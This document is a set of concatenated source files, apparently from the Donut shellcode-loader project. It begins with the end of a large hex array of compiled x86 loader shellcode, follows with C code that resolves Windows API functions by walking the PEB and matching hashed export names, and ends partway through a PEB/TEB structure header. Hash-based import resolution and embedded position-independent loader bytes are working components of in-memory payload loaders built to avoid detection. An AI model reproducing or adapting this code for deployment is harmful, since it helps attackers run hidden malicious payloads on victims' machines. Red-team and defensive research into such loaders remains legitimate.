545 | 0x10, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, 0x8b, 0x83, 0x40, 0x07, 0x00, | |
546 | 0x00, 0x8d, 0x04, 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x57, 0x55, 0xe8, | |
547 | 0x15, 0x04, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x68, 0x00, 0xc0, 0x00, 0x00, | |
548 | 0x57, 0x55, 0xff, 0x53, 0x40, 0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0xd8, | |
549 | 0x00, 0x00, 0x00, 0xc3, 0x83, 0xec, 0x0c, 0x53, 0x55, 0x56, 0x8b, 0x74, | |
550 | 0x24, 0x1c, 0x57, 0x83, 0xbe, 0x0c, 0x05, 0x00, 0x00, 0x01, 0x8d, 0xbe, | |
551 | 0x48, 0x07, 0x00, 0x00, 0x74, 0x02, 0x8b, 0x3f, 0x8b, 0x86, 0x40, 0x07, | |
552 | 0x00, 0x00, 0x33, 0xed, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0x8d, | |
553 | 0x04, 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x55, 0xff, 0x56, 0x3c, 0x8b, | |
554 | 0xd8, 0x85, 0xdb, 0x0f, 0x84, 0xd1, 0x00, 0x00, 0x00, 0x8b, 0x8f, 0x10, | |
555 | 0x19, 0x00, 0x00, 0x03, 0xc9, 0x51, 0x53, 0x6a, 0xff, 0x8d, 0x8f, 0x18, | |
556 | 0x19, 0x00, 0x00, 0x51, 0x55, 0x55, 0xff, 0x56, 0x50, 0x55, 0x55, 0xff, | |
557 | 0x96, 0xa8, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0x87, 0x00, 0x00, | |
558 | 0x00, 0x8d, 0x44, 0x24, 0x10, 0x50, 0x8d, 0x86, 0xec, 0x04, 0x00, 0x00, | |
559 | 0x50, 0x6a, 0x01, 0x55, 0x8d, 0x86, 0xdc, 0x04, 0x00, 0x00, 0x50, 0xff, | |
560 | 0x96, 0xac, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x61, 0x8b, 0x44, 0x24, | |
561 | 0x10, 0x8d, 0x54, 0x24, 0x20, 0x52, 0x53, 0x50, 0x8b, 0x08, 0xff, 0x91, | |
562 | 0x04, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x40, 0x66, 0x39, 0x6c, 0x24, | |
563 | 0x20, 0x74, 0x39, 0x8b, 0x4c, 0x24, 0x10, 0x8d, 0x44, 0x24, 0x14, 0x50, | |
564 | 0x8d, 0x86, 0xfc, 0x04, 0x00, 0x00, 0x50, 0x8b, 0x11, 0x51, 0xff, 0x12, | |
565 | 0x85, 0xc0, 0x75, 0x20, 0x8b, 0x44, 0x24, 0x10, 0x8d, 0x54, 0x24, 0x18, | |
566 | 0x52, 0xff, 0x74, 0x24, 0x18, 0x8b, 0x08, 0x50, 0xff, 0x91, 0x8c, 0x00, | |
567 | 0x00, 0x00, 0x8b, 0x44, 0x24, 0x14, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, | |
568 | 0x8b, 0x44, 0x24, 0x10, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x08, 0xff, 0x96, | |
569 | 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x86, 0x40, 0x07, 0x00, 0x00, 0x8d, 0x04, | |
570 | 0x45, 0x02, 0x00, 0x00, 0x00, 0x50, 0x55, 0x53, 0xe8, 0xf8, 0x02, 0x00, | |
571 | 0x00, 0x83, 0xc4, 0x0c, 0x68, 0x00, 0xc0, 0x00, 0x00, 0x55, 0x53, 0xff, | |
572 | 0x56, 0x40, 0x5f, 0x5e, 0x5d, 0x5b, 0x83, 0xc4, 0x0c, 0xc3, 0x8b, 0x44, | |
573 | 0x24, 0x0c, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00, 0x33, 0xc0, 0xc2, 0x10, | |
574 | 0x00, 0x8b, 0x44, 0x24, 0x04, 0x2b, 0x44, 0x24, 0x08, 0xc3, 0x8b, 0x44, | |
575 | 0x24, 0x04, 0x99, 0xf7, 0x7c, 0x24, 0x08, 0xc3, 0xe8, 0x00, 0x00, 0x00, | |
576 | 0x00, 0x58, 0x83, 0xe8, 0x05, 0xc3, 0x55, 0x8b, 0xec, 0x64, 0xa1, 0x30, | |
577 | 0x00, 0x00, 0x00, 0x33, 0xc9, 0x56, 0x8b, 0x40, 0x0c, 0x8b, 0x70, 0x0c, | |
578 | 0xeb, 0x20, 0x85, 0xc9, 0x75, 0x23, 0xff, 0x75, 0x18, 0xff, 0x75, 0x14, | |
579 | 0xff, 0x75, 0x10, 0xff, 0x75, 0x0c, 0x50, 0xff, 0x75, 0x08, 0xe8, 0x8c, | |
580 | 0xed, 0xff, 0xff, 0x8b, 0x36, 0x83, 0xc4, 0x18, 0x8b, 0xc8, 0x8b, 0x46, | |
581 | 0x18, 0x85, 0xc0, 0x75, 0xd9, 0x8b, 0xc1, 0x5e, 0x5d, 0xc3, 0x8b, 0x44, | |
582 | 0x24, 0x08, 0x56, 0x8b, 0x74, 0x24, 0x08, 0x8a, 0x16, 0x84, 0xd2, 0x74, | |
583 | 0x14, 0x8a, 0xca, 0x2b, 0xf0, 0x8a, 0xd1, 0x3a, 0x08, 0x75, 0x0a, 0x40, | |
584 | 0x8a, 0x0c, 0x06, 0x8a, 0xd1, 0x84, 0xc9, 0x75, 0xf0, 0x0f, 0xb6, 0x08, | |
585 | 0x0f, 0xb6, 0xc2, 0x2b, 0xc1, 0x5e, 0xc3, 0x83, 0xec, 0x14, 0x53, 0x8b, | |
586 | 0x5c, 0x24, 0x20, 0x33, 0xc0, 0x55, 0x8b, 0x6c, 0x24, 0x28, 0x56, 0x57, | |
587 | 0x33, 0xff, 0x89, 0x44, 0x24, 0x2c, 0x33, 0xf6, 0x89, 0x74, 0x24, 0x10, | |
588 | 0x8b, 0x4c, 0x24, 0x28, 0x8a, 0x0c, 0x08, 0x84, 0xc9, 0x74, 0x11, 0x83, | |
589 | 0xf8, 0x40, 0x74, 0x0c, 0x88, 0x4c, 0x3c, 0x14, 0x47, 0x40, 0x89, 0x44, | |
590 | 0x24, 0x2c, 0xeb, 0x57, 0x6a, 0x10, 0x58, 0x2b, 0xc7, 0x8d, 0x74, 0x24, | |
591 | 0x14, 0x50, 0x03, 0xf7, 0x6a, 0x00, 0x56, 0xe8, 0xfd, 0x01, 0x00, 0x00, | |
592 | 0x83, 0xc4, 0x0c, 0xc6, 0x06, 0x80, 0x83, 0xff, 0x0c, 0x72, 0x21, 0x55, | |
593 | 0x8d, 0x44, 0x24, 0x18, 0x53, 0x50, 0xe8, 0x5e, 0x00, 0x00, 0x00, 0x6a, | |
594 | 0x10, 0x33, 0xd8, 0x33, 0xea, 0x8d, 0x44, 0x24, 0x24, 0x6a, 0x00, 0x50, | |
595 | 0xe8, 0xd4, 0x01, 0x00, 0x00, 0x83, 0xc4, 0x18, 0x8b, 0x44, 0x24, 0x2c, | |
596 | 0x8b, 0x74, 0x24, 0x10, 0xc1, 0xe0, 0x03, 0x46, 0x6a, 0x10, 0x89, 0x44, | |
597 | 0x24, 0x24, 0x5f, 0x89, 0x74, 0x24, 0x10, 0x83, 0xff, 0x10, 0x75, 0x15, | |
598 | 0x55, 0x8d, 0x44, 0x24, 0x18, 0x53, 0x50, 0xe8, 0x21, 0x00, 0x00, 0x00, | |
599 | 0x83, 0xc4, 0x0c, 0x33, 0xd8, 0x33, 0xea, 0x33, 0xff, 0x8b, 0x44, 0x24, | |
600 | 0x2c, 0x85, 0xf6, 0x0f, 0x84, 0x67, 0xff, 0xff, 0xff, 0x5f, 0x5e, 0x8b, | |
601 | 0xd5, 0x8b, 0xc3, 0x5d, 0x5b, 0x83, 0xc4, 0x14, 0xc3, 0x83, 0xec, 0x10, | |
602 | 0x8b, 0x44, 0x24, 0x18, 0x8b, 0x54, 0x24, 0x1c, 0x53, 0x55, 0x56, 0x8b, | |
603 | 0x74, 0x24, 0x20, 0x33, 0xdb, 0x57, 0x8d, 0x7c, 0x24, 0x10, 0xa5, 0xa5, | |
604 | 0xa5, 0xa5, 0x8b, 0x4c, 0x24, 0x14, 0x8b, 0x74, 0x24, 0x1c, 0x8b, 0x6c, | |
605 | 0x24, 0x18, 0x8b, 0x7c, 0x24, 0x10, 0x89, 0x4c, 0x24, 0x28, 0x8b, 0xce, | |
606 | 0xc1, 0xc8, 0x08, 0x8b, 0x74, 0x24, 0x28, 0x03, 0xc2, 0xc1, 0xce, 0x08, | |
607 | 0x33, 0xc7, 0x03, 0xf7, 0xc1, 0xc2, 0x03, 0x33, 0xf3, 0xc1, 0xc7, 0x03, | |
608 | 0x33, 0xd0, 0x89, 0x6c, 0x24, 0x28, 0x33, 0xfe, 0x8b, 0xe9, 0x43, 0x83, | |
609 | 0xfb, 0x1b, 0x72, 0xd6, 0x5f, 0x5e, 0x5d, 0x5b, 0x83, 0xc4, 0x10, 0xc3, | |
610 | 0x8b, 0x54, 0x24, 0x10, 0x83, 0xec, 0x14, 0x53, 0x8b, 0x5c, 0x24, 0x24, | |
611 | 0x85, 0xd2, 0x0f, 0x84, 0xe8, 0x00, 0x00, 0x00, 0x8b, 0x44, 0x24, 0x20, | |
612 | 0x55, 0x33, 0xed, 0x45, 0x56, 0x8d, 0x48, 0x0f, 0x2b, 0xe8, 0x57, 0x89, | |
613 | 0x4c, 0x24, 0x10, 0x89, 0x6c, 0x24, 0x34, 0x8b, 0xf0, 0x8d, 0x7c, 0x24, | |
614 | 0x14, 0x33, 0xc9, 0xa5, 0xa5, 0xa5, 0xa5, 0x8b, 0x74, 0x24, 0x28, 0x8b, | |
615 | 0x04, 0x8e, 0x31, 0x44, 0x8c, 0x14, 0x41, 0x83, 0xf9, 0x04, 0x72, 0xf3, | |
616 | 0x8b, 0x74, 0x24, 0x20, 0x8b, 0x44, 0x24, 0x1c, 0x8b, 0x7c, 0x24, 0x18, | |
617 | 0x8b, 0x4c, 0x24, 0x14, 0xc7, 0x44, 0x24, 0x30, 0x10, 0x00, 0x00, 0x00, | |
618 | 0x03, 0xcf, 0x03, 0xc6, 0xc1, 0xc7, 0x05, 0x33, 0xf9, 0xc1, 0xc6, 0x08, | |
619 | 0x33, 0xf0, 0xc1, 0xc1, 0x10, 0x03, 0xc7, 0x03, 0xce, 0xc1, 0xc7, 0x07, | |
620 | 0xc1, 0xc6, 0x0d, 0x33, 0xf8, 0x33, 0xf1, 0xc1, 0xc0, 0x10, 0x83, 0x6c, | |
621 | 0x24, 0x30, 0x01, 0x75, 0xd7, 0x8b, 0x6c, 0x24, 0x28, 0x89, 0x4c, 0x24, | |
622 | 0x14, 0x33, 0xc9, 0x89, 0x74, 0x24, 0x20, 0x89, 0x7c, 0x24, 0x18, 0x89, | |
623 | 0x44, 0x24, 0x1c, 0x8b, 0x44, 0x8d, 0x00, 0x31, 0x44, 0x8c, 0x14, 0x41, | |
624 | 0x83, 0xf9, 0x04, 0x72, 0xf2, 0x8b, 0x6c, 0x24, 0x34, 0x8b, 0xca, 0x6a, | |
625 | 0x10, 0x58, 0x3b, 0xd0, 0x0f, 0x47, 0xc8, 0x85, 0xc9, 0x7e, 0x19, 0x8d, | |
626 | 0x7c, 0x24, 0x14, 0x8b, 0xf3, 0x2b, 0xfb, 0x8b, 0xe9, 0x8a, 0x04, 0x37, | |
627 | 0x30, 0x06, 0x46, 0x83, 0xed, 0x01, 0x75, 0xf5, 0x8b, 0x6c, 0x24, 0x34, | |
628 | 0x2b, 0xd1, 0x03, 0xd9, 0x8b, 0x4c, 0x24, 0x10, 0x80, 0x01, 0x01, 0x75, | |
629 | 0x08, 0x49, 0x8d, 0x04, 0x29, 0x85, 0xc0, 0x7f, 0xf3, 0x8b, 0x44, 0x24, | |
630 | 0x2c, 0x85, 0xd2, 0x0f, 0x85, 0x32, 0xff, 0xff, 0xff, 0x5f, 0x5e, 0x5d, | |
631 | 0x5b, 0x83, 0xc4, 0x14, 0xc3, 0x8b, 0x54, 0x24, 0x0c, 0x8b, 0x44, 0x24, | |
632 | 0x04, 0x56, 0x8b, 0xf0, 0x85, 0xd2, 0x74, 0x13, 0x57, 0x8b, 0x7c, 0x24, | |
633 | 0x10, 0x2b, 0xf8, 0x8a, 0x0c, 0x37, 0x88, 0x0e, 0x46, 0x83, 0xea, 0x01, | |
634 | 0x75, 0xf5, 0x5f, 0x5e, 0xc3, 0x8a, 0x44, 0x24, 0x08, 0x8b, 0x4c, 0x24, | |
635 | 0x0c, 0x57, 0x8b, 0x7c, 0x24, 0x08, 0xf3, 0xaa, 0x8b, 0x44, 0x24, 0x08, | |
636 | 0x5f, 0xc3}; | |
637 |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | // locate address of API in export table using Maru hash function | |
32 | LPVOID FindExport(PDONUT_INSTANCE inst, LPVOID base, ULONG64 api_hash, ULONG64 iv){ | |
33 | PIMAGE_DOS_HEADER dos; | |
34 | PIMAGE_NT_HEADERS nt; | |
35 | DWORD i, j, cnt, rva; | |
36 | PIMAGE_DATA_DIRECTORY dir; | |
37 | PIMAGE_EXPORT_DIRECTORY exp; | |
38 | PDWORD adr; | |
39 | PDWORD sym; | |
40 | PWORD ord; | |
41 | PCHAR api, dll, p; | |
42 | LPVOID addr=NULL; | |
43 | ULONG64 dll_hash; | |
44 | CHAR buf[MAX_PATH], dll_name[64], api_name[128]; | |
45 | ||
46 | dos = (PIMAGE_DOS_HEADER)base; | |
47 | nt = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew); | |
48 | dir = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory; | |
49 | rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress; | |
50 | ||
51 | // if no export table, return NULL | |
52 | if (rva==0) return NULL; | |
53 | ||
54 | exp = RVA2VA(PIMAGE_EXPORT_DIRECTORY, base, rva); | |
55 | cnt = exp->NumberOfNames; | |
56 | ||
57 | // if no api names, return NULL | |
58 | if (cnt==0) return NULL; | |
59 | ||
60 | adr = RVA2VA(PDWORD,base, exp->AddressOfFunctions); | |
61 | sym = RVA2VA(PDWORD,base, exp->AddressOfNames); | |
62 | ord = RVA2VA(PWORD, base, exp->AddressOfNameOrdinals); | |
63 | dll = RVA2VA(PCHAR, base, exp->Name); | |
64 | ||
65 | // get hash of DLL string converted to lowercase | |
66 | for(i=0;dll[i]!=0;i++) { | |
67 | buf[i] = dll[i] | 0x20; | |
68 | } | |
69 | buf[i] = 0; | |
70 | dll_hash = maru(buf, iv); | |
71 | ||
72 | do { | |
73 | // calculate hash of api string | |
74 | api = RVA2VA(PCHAR, base, sym[cnt-1]); | |
75 | // xor with DLL hash and compare with hash to find | |
76 | if ((maru(api, iv) ^ dll_hash) == api_hash) { | |
77 | // return address of function | |
78 | addr = RVA2VA(LPVOID, base, adr[ord[cnt-1]]); | |
79 | ||
80 | // is this a forward reference? | |
81 | if ((PBYTE)addr >= (PBYTE)exp && | |
82 | (PBYTE)addr < (PBYTE)exp + | |
83 | dir[IMAGE_DIRECTORY_ENTRY_EXPORT].Size) | |
84 | { | |
85 | DPRINT("%016llx is forwarded to %s", | |
86 | api_hash, (char*)addr); | |
87 | ||
88 | // copy DLL name to buffer | |
89 | p=(char*)addr; | |
90 | ||
91 | for(i=0; p[i] != 0 && i < sizeof(dll_name)-4; i++) { | |
92 | dll_name[i] = p[i]; | |
93 | if(p[i] == '.') break; | |
94 | } | |
95 | ||
96 | dll_name[i+1] = 'd'; | |
97 | dll_name[i+2] = 'l'; | |
98 | dll_name[i+3] = 'l'; | |
99 | dll_name[i+4] = 0; | |
100 | ||
101 | p += i + 1; | |
102 | ||
103 | // copy API name to buffer | |
104 | for(i=0; p[i] != 0 && i < sizeof(api_name)-1;i++) { | |
105 | api_name[i] = p[i]; | |
106 | } | |
107 | api_name[i] = 0; | |
108 | ||
109 | DPRINT("Trying to load %s", dll_name); | |
110 | HMODULE hModule = inst->api.LoadLibrary(dll_name); | |
111 | ||
112 | if(hModule != NULL) { | |
113 | DPRINT("Calling GetProcAddress(%s)", api_name); | |
114 | addr = inst->api.GetProcAddress(hModule, api_name); | |
115 | } else addr = NULL; | |
116 | } | |
117 | return addr; | |
118 | } | |
119 | } while (--cnt && addr == NULL); | |
120 | ||
121 | return addr; | |
122 | } | |
123 | ||
124 | // search all modules in the PEB for API | |
125 | LPVOID xGetProcAddress(PDONUT_INSTANCE inst, ULONG64 ulHash, ULONG64 ulIV) { | |
126 | PPEB peb; | |
127 | PPEB_LDR_DATA ldr; | |
128 | PLDR_DATA_TABLE_ENTRY dte; | |
129 | LPVOID addr = NULL; | |
130 | ||
131 | #if defined(_WIN64) | |
132 | peb = (PPEB) __readgsqword(0x60); | |
133 | #else | |
134 | peb = (PPEB) __readfsdword(0x30); | |
135 | #endif | |
136 | ||
137 | ldr = (PPEB_LDR_DATA)peb->Ldr; | |
138 | ||
139 | // for each DLL loaded | |
140 | for (dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink; | |
141 | dte->DllBase != NULL && addr == NULL; | |
142 | dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink) | |
143 | { | |
144 | // search the export table for api | |
145 | addr = FindExport(inst, dte->DllBase, ulHash, ulIV); | |
146 | } | |
147 | return addr; | |
148 | } |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #ifndef PEB_H | |
32 | #define PEB_H | |
33 | ||
34 | #include <windows.h> | |
35 | ||
36 | typedef void *PPS_POST_PROCESS_INIT_ROUTINE; | |
37 | ||
38 | typedef struct _LSA_UNICODE_STRING { | |
39 | USHORT Length; | |
40 | USHORT MaximumLength; | |
41 | PWSTR Buffer; | |
42 | } LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING; | |
43 | ||
44 | typedef struct _RTL_USER_PROCESS_PARAMETERS { | |
45 | BYTE Reserved1[16]; | |
46 | PVOID Reserved2[10]; | |
47 | UNICODE_STRING ImagePathName; | |
48 | UNICODE_STRING CommandLine; | |
49 | } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS; | |
50 | ||
51 | // PEB defined by rewolf | |
52 | // http://blog.rewolf.pl/blog/?p=573 | |
53 | typedef struct _PEB_LDR_DATA { | |
54 | ULONG Length; | |
55 | BOOL Initialized; | |
56 | LPVOID SsHandle; | |
57 | LIST_ENTRY InLoadOrderModuleList; | |
58 | LIST_ENTRY InMemoryOrderModuleList; | |
59 | LIST_ENTRY InInitializationOrderModuleList; | |
60 | } PEB_LDR_DATA, *PPEB_LDR_DATA; | |
61 | ||
62 | typedef struct _LDR_DATA_TABLE_ENTRY | |
63 | { | |
64 | LIST_ENTRY InLoadOrderLinks; | |
65 | LIST_ENTRY InMemoryOrderLinks; | |
66 | LIST_ENTRY InInitializationOrderLinks; | |
67 | LPVOID DllBase; | |
68 | LPVOID EntryPoint; | |
69 | ULONG SizeOfImage; | |
70 | UNICODE_STRING FullDllName; | |
71 | UNICODE_STRING BaseDllName; | |
72 | } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; | |
73 | ||
74 | typedef struct _PEB { | |
75 | BYTE InheritedAddressSpace; | |
76 | BYTE ReadImageFileExecOptions; | |
77 | BYTE BeingDebugged; | |
78 | BYTE _SYSTEM_DEPENDENT_01; | |
79 | ||
80 | LPVOID Mutant; | |
81 | LPVOID ImageBaseAddress; | |
82 | ||
83 | PPEB_LDR_DATA Ldr; | |
84 | PRTL_USER_PROCESS_PARAMETERS ProcessParameters; | |
85 | LPVOID SubSystemData; | |
86 | LPVOID ProcessHeap; | |
87 | LPVOID FastPebLock; | |
88 | LPVOID _SYSTEM_DEPENDENT_02; | |
89 | LPVOID _SYSTEM_DEPENDENT_03; | |
90 | LPVOID _SYSTEM_DEPENDENT_04; | |
91 | union { | |
92 | LPVOID KernelCallbackTable; | |
93 | LPVOID UserSharedInfoPtr; | |
94 | }; | |
95 | DWORD SystemReserved; | |
96 | DWORD _SYSTEM_DEPENDENT_05; | |
97 | LPVOID _SYSTEM_DEPENDENT_06; | |
98 | LPVOID TlsExpansionCounter; | |
99 | LPVOID TlsBitmap; | |
100 | DWORD TlsBitmapBits[2]; | |
101 | LPVOID ReadOnlySharedMemoryBase; | |
102 | LPVOID _SYSTEM_DEPENDENT_07; | |
103 | LPVOID ReadOnlyStaticServerData; | |
104 | LPVOID AnsiCodePageData; | |
105 | LPVOID OemCodePageData; | |
106 | LPVOID UnicodeCaseTableData; | |
107 | DWORD NumberOfProcessors; | |
108 | union | |
109 | { | |
110 | DWORD NtGlobalFlag; | |
111 | LPVOID dummy02; | |
112 | }; | |
113 | LARGE_INTEGER CriticalSectionTimeout; | |
114 | LPVOID HeapSegmentReserve; | |
115 | LPVOID HeapSegmentCommit; | |
116 | LPVOID HeapDeCommitTotalFreeThreshold; | |
117 | LPVOID HeapDeCommitFreeBlockThreshold; | |
118 | DWORD NumberOfHeaps; | |
119 | DWORD MaximumNumberOfHeaps; | |
120 | LPVOID ProcessHeaps; | |
121 | LPVOID GdiSharedHandleTable; | |
122 | LPVOID ProcessStarterHelper; | |
123 | LPVOID GdiDCAttributeList; | |
124 | LPVOID LoaderLock; | |
125 | DWORD OSMajorVersion; | |
126 | DWORD OSMinorVersion; | |
127 | WORD OSBuildNumber; | |
128 | WORD OSCSDVersion; | |
129 | DWORD OSPlatformId; | |
130 | DWORD ImageSubsystem; | |
131 | DWORD ImageSubsystemMajorVersion; | |
132 | LPVOID ImageSubsystemMinorVersion; | |
133 | union | |
134 | { | |
135 | LPVOID ImageProcessAffinityMask; | |
136 | LPVOID ActiveProcessAffinityMask; | |
137 | }; | |
138 | #ifdef _WIN64 | |
139 | LPVOID GdiHandleBuffer[64]; | |
140 | #else | |
141 | LPVOID GdiHandleBuffer[32]; | |
142 | #endif | |
143 | LPVOID PostProcessInitRoutine; | |
144 | LPVOID TlsExpansionBitmap; | |
145 | DWORD TlsExpansionBitmapBits[32]; | |
146 | LPVOID SessionId; | |
147 | ULARGE_INTEGER AppCompatFlags; | |
148 | ULARGE_INTEGER AppCompatFlagsUser; | |
149 | LPVOID pShimData; | |
150 | LPVOID AppCompatInfo; | |
151 | PUNICODE_STRING CSDVersion; | |
152 | LPVOID ActivationContextData; | |
153 | LPVOID ProcessAssemblyStorageMap; | |
154 | LPVOID SystemDefaultActivationContextData; | |
155 | LPVOID SystemAssemblyStorageMap; | |
156 | LPVOID MinimumStackCommit; | |
157 | } PEB, *PPEB; | |
158 | ||
159 | ||
160 | typedef struct _CLIENT_ID { | |
161 | HANDLE UniqueProcess; | |
162 | HANDLE UniqueThread; | |
163 | } CLIENT_ID, *PCLIENT_ID; | |
164 | ||
165 | typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME *PRTL_ACTIVATION_CONTEXT_STACK_FRAME; | |
166 | typedef struct _ACTIVATION_CONTEXT *PACTIVATION_CONTEXT; | |
167 | typedef struct _TEB_ACTIVE_FRAME *PTEB_ACTIVE_FRAME; | |
168 | typedef struct _TEB_ACTIVE_FRAME_CONTEXT *PTEB_ACTIVE_FRAME_CONTEXT; | |
169 | ||
170 | typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME { | |
171 | PRTL_ACTIVATION_CONTEXT_STACK_FRAME Previous; | |
172 | PACTIVATION_CONTEXT *ActivationContext; | |
173 | ULONG Flags; | |
174 | } RTL_ACTIVATION_CONTEXT_STACK_FRAME, *PRTL_ACTIVATION_CONTEXT_STACK_FRAME; | |
175 | ||
176 | typedef struct _ACTIVATION_CONTEXT_STACK | |
177 | { | |
178 | PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame; | |
179 | LIST_ENTRY FrameListCache; | |
180 | ULONG Flags; | |
181 | ULONG NextCookieSequenceNumber; | |
182 | ULONG StackId; | |
183 | } ACTIVATION_CONTEXT_STACK, *PACTIVATION_CONTEXT_STACK; | |
184 | #define GDI_BATCH_BUFFER_SIZE 310 | |
185 | ||
186 | typedef struct _GDI_TEB_BATCH | |
187 | { | |
188 | ULONG Offset; | |
189 | ULONG_PTR HDC; | |
190 | ULONG Buffer[GDI_BATCH_BUFFER_SIZE]; | |
191 | } GDI_TEB_BATCH, *PGDI_TEB_BATCH; | |
192 | ||
193 | typedef struct _TEB_ACTIVE_FRAME_CONTEXT | |
194 | { | |
195 | ULONG Flags; | |
196 | PSTR FrameName; | |
197 | } TEB_ACTIVE_FRAME_CONTEXT, *PTEB_ACTIVE_FRAME_CONTEXT; | |
198 | ||
199 | typedef struct _TEB_ACTIVE_FRAME | |
200 | { | |
201 | ULONG Flags; | |
202 | struct _TEB_ACTIVE_FRAME *Previous; | |
203 | PTEB_ACTIVE_FRAME_CONTEXT Context; | |
204 | } TEB_ACTIVE_FRAME, *PTEB_ACTIVE_FRAME; | |
205 | ||
206 | #if !defined(_MSC_VER) | |
207 | typedef struct _PROCESSOR_NUMBER { | |
208 | USHORT Group; | |
209 | UCHAR Number; | |
210 | UCHAR Reserved; | |
211 | } PROCESSOR_NUMBER, *PPROCESSOR_NUMBER; | |
212 | #endif | |
213 | ||
214 | typedef struct _TEB | |
215 | { | |
216 | NT_TIB NtTib; | |
217 | ||
218 | PVOID EnvironmentPointer; | |
219 | CLIENT_ID ClientId; | |
220 | PVOID ActiveRpcHandle; | |
221 | PVOID ThreadLocalStoragePointer; | |
222 | PPEB ProcessEnvironmentBlock; | |
223 | ||
224 | ULONG LastErrorValue; | |
225 | ULONG CountOfOwnedCriticalSections; | |
226 | PVOID CsrClientThread; | |
227 | PVOID Win32ThreadInfo; | |
228 | ULONG User32Reserved[26]; | |
229 | ULONG UserReserved[5]; | |
230 | PVOID WOW32Reserved; | |
231 | LCID CurrentLocale; | |
232 | ULONG FpSoftwareStatusRegister; | |
233 | PVOID SystemReserved1[54]; | |
234 | NTSTATUS ExceptionCode; | |
235 | PVOID ActivationContextStackPointer; | |
236 | #ifdef _M_X64 | |
237 | UCHAR SpareBytes[24]; | |
238 | #else | |
